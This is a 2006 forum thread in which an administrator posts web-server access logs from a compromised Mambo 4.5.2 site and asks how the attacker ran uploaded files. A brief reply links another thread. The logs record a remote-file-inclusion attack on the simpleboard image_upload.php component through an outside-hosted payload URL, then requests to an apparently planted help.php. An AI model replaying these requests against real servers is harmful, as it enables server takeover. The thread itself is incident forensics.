Mambo 4.5.2 image_upload.php (unsecure) - Mambo

garthfield · August 4th, 2006, 04:01

Hello,

One of our user's installed Mambo 4.5.2 which was subsequently hacked and the attacker uploaded a rootkit to /tmp and took control of the server. The attacker used the http://Anonymouse.org website to post files to the server.

Looking at the access_log entries for the attack below how was the attacker allowed to execute the files he had uploaded?

Is this a known exploit to the mambo community? and has this been fixed in llater releases?

Garthfield

85.195.119.22 - - [11/Jul/2006:23:53:00 +0100] "GET /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 37830 "-" "http://Anonymouse.org/ (Unix)"
85.195.119.22 - - [11/Jul/2006:23:53:33 +0100] "POST /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 35670 "-" "http://Anonymouse.org/ (Unix)"
85.195.119.22 - - [11/Jul/2006:23:53:58 +0100] "POST /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 34775 "-" "http://Anonymouse.org/ (Unix)"
85.195.119.22 - - [11/Jul/2006:23:55:18 +0100] "POST /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 37950 "-" "http://Anonymouse.org/ (Unix)"
85.195.119.22 - - [11/Jul/2006:23:55:41 +0100] "POST /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 37950 "-" "http://Anonymouse.org/ (Unix)"
85.195.119.22 - - [11/Jul/2006:23:55:48 +0100] "GET /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 46 "-" "http://Anonymouse.org/ (Unix)"
85.195.119.22 - - [11/Jul/2006:23:56:02 +0100] "GET /components/com_simpleboard/help.php HTTP/1.0" 200 36685 "-" "http://Anonymouse.org/ (Unix)"
85.195.119.22 - - [12/Jul/2006:00:08:04 +0100] "POST /components/com_simpleboard/help.php HTTP/1.0" 200 2437 "-" "http://Anonymouse.org/ (Unix)"
85.195.119.22 - - [13/Jul/2006:02:53:17 +0100] "POST /components/com_simpleboard/help.php HTTP/1.0" 200 66859 "-" "http://Anonymouse.org/ (Unix)"

glutton · August 5th, 2006, 07:14

http://forum.mamboserver.com/showthread.php?t=82684

This has been covered with some good tips in a few threads recently, try this one for starters.

August 4th, 2006, 04:01	#1
garthfield Join Date: Aug 2006 Posts: 1	Mambo 4.5.2 image_upload.php (unsecure) Hello, One of our user's installed Mambo 4.5.2 which was subsequently hacked and the attacker uploaded a rootkit to /tmp and took control of the server. The attacker used the http://Anonymouse.org website to post files to the server. Looking at the access_log entries for the attack below how was the attacker allowed to execute the files he had uploaded? Is this a known exploit to the mambo community? and has this been fixed in llater releases? Garthfield 85.195.119.22 - - [11/Jul/2006:23:53:00 +0100] "GET /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 37830 "-" "http://Anonymouse.org/ (Unix)" 85.195.119.22 - - [11/Jul/2006:23:53:33 +0100] "POST /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 35670 "-" "http://Anonymouse.org/ (Unix)" 85.195.119.22 - - [11/Jul/2006:23:53:58 +0100] "POST /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 34775 "-" "http://Anonymouse.org/ (Unix)" 85.195.119.22 - - [11/Jul/2006:23:55:18 +0100] "POST /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 37950 "-" "http://Anonymouse.org/ (Unix)" 85.195.119.22 - - [11/Jul/2006:23:55:41 +0100] "POST /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 37950 "-" "http://Anonymouse.org/ (Unix)" 85.195.119.22 - - [11/Jul/2006:23:55:48 +0100] "GET /components/com_simpleboard/image_upload.php/image_upload.php?sbp=http://www.bellos.se/components/com_user/robots.txt? HTTP/1.0" 200 46 "-" "http://Anonymouse.org/ (Unix)" 85.195.119.22 - - [11/Jul/2006:23:56:02 +0100] "GET /components/com_simpleboard/help.php HTTP/1.0" 200 36685 "-" "http://Anonymouse.org/ (Unix)" 85.195.119.22 - - [12/Jul/2006:00:08:04 +0100] "POST /components/com_simpleboard/help.php HTTP/1.0" 200 2437 "-" "http://Anonymouse.org/ (Unix)" 85.195.119.22 - - [13/Jul/2006:02:53:17 +0100] "POST /components/com_simpleboard/help.php HTTP/1.0" 200 66859 "-" "http://Anonymouse.org/ (Unix)"

August 5th, 2006, 07:14	#2
glutton Join Date: Jul 2005 Posts: 62	See "Mambo Hacked" Thread http://forum.mamboserver.com/showthread.php?t=82684 This has been covered with some good tips in a few threads recently, try this one for starters.

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
You can now use Mambo Components on NON MAMBO sites!!!!!	PhilTaylor (aka PrazGod)	Open Source Products for Mambo	32	April 2nd, 2008 03:46
The actual usefulness of Mambo?	zimen	General Questions	10	November 19th, 2005 04:15
Links	molok	Spanish Forum	3	August 17th, 2005 12:45
An extensive listing of Mambo security problems	afaton	Security & Performance	4	December 8th, 2004 19:51